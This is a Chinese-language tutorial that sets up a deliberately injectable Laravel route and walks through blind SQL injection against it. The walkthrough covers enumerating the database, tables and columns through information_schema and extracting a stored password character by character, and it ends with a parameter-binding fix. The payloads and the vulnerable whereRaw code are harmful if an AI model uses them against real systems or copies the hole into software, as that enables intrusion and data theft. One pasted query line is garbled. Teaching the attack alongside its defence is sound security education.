首頁  >  文章  >  php框架  >  透過laravel漏洞實例解析sql盲注原理

透過laravel漏洞實例解析sql盲注原理

WBOY
WBOY轉載
2022-07-27 10:57:332493瀏覽

這篇文章為大家帶來了關於laravel的相關知識,其中主要介紹了怎樣通過造一個laravel漏洞來講解sql盲注原理,所謂的盲注就是在服務器沒有錯誤回顯的時候完成的注入攻擊,下面一起來看一下,希望對大家有幫助。

透過laravel漏洞實例解析sql盲注原理

【相關推薦:laravel影片教學

環境

composer create-project laravel/laravel lar9 // 安装laravel9
// 编辑.env  修改为DEBUG=false 配置数据库
DEBUG=false
DB_HOST=....
php artisan migrate
php artisan serve // 启动
// 插入数据
insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');

建立漏洞

// routes/web.php
Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = '.$id)->first();
 return $user->name ?? '';
});
// 最后转换的sql是: select * from users where id = $id

測試

http://127.0.0.1:8000/?id=1'
// 500
http://127.0.0.1:8000/?id=1 and 1=2
// select * from users where id = 1 and 1=2; 返回空
http://127.0.0.1:8000/?id=1 and 1=1 
// select * from users where id = 1 and 1=1 返回xxh

#步驟

資料庫名稱

猜出資料名長度

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 1
select * from users where id = 1 and length(database()) = 2
// 一直循环下去

猜出資料庫名稱

从第一步 知道了数据库名长度
`select * from users where id = 1 and substr(database(),1,1) =a` 
`select * from users where id = 1 and substr(database(),1,1) =b` 
// 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度

最終: laravel_project

表名

##以下的步驟和猜資料庫差不多,就簡說了。

information_schema

information_schema 是mysql 附帶的,

資料庫名表名列類型等都有記錄,猜表字段明需要從這個資料庫來。

猜laravel_project 的表格數量

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5
mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";
+----------+
| count(*) |
+----------+
|        5 |
+----------+

猜第一個表名的長度

與[猜出資料名長度] 此不多。

猜第一個表名

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'
mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;
+------------------------+
| substr(table_name,1,1) |
+------------------------+
| f                      |
+------------------------+
// 得出第一个表的第一个字段是f  然后查第

最後得到第一個表格名稱為: failed_jobs

猜欄位

和猜表一模一樣的邏輯。

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数

猜資料

資料這才是最重要的。

因為 failed_jobs 沒數據,所以我換成 users 來。

users 有個 password 欄位。

mysql> select substr((select password from users limit 0,1),1,1);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,1) |
+----------------------------------------------------+
| w                                                  |
+----------------------------------------------------+
得出第一个是w,存起来,最后判断 
mysql> select substr((select password from users limit 0,1),1,2);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,2) |
+----------------------------------------------------+
| wo                                                 |
+----------------------------------------------------+
第二个值为o
用第一个值 + 第二个值作为盲注

……

防禦

(有時候where 不滿足需求,就需要whereRaw)

如果需要,記得綁定就好。

Route::get('/', function () {
 $id = request()->id;
 $user = \App\Models\User::whereRaw('id = ?',[$id])->first();
 return $user->name ?? '';
});

只要安份的用框架,不會會漏洞的。

那些老項目,漏洞滿地飛。

現在這個時代,找漏洞難登天。

Ps

上面為了解釋簡單,用是最簡單的查找。

手工盲注應該用二分來找出。

select * from users where id = 1 and  substr(database(),1,1) ='a';
换成二分:
 select * from users where id = 1 and  ascii(substr(database(),1,1)) > 99;

最好還是直接借助工具 sqlmap, 直接掃出來。

【相關推薦:

laravel影片教學

以上是透過laravel漏洞實例解析sql盲注原理的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:learnku.com。如有侵權,請聯絡admin@php.cn刪除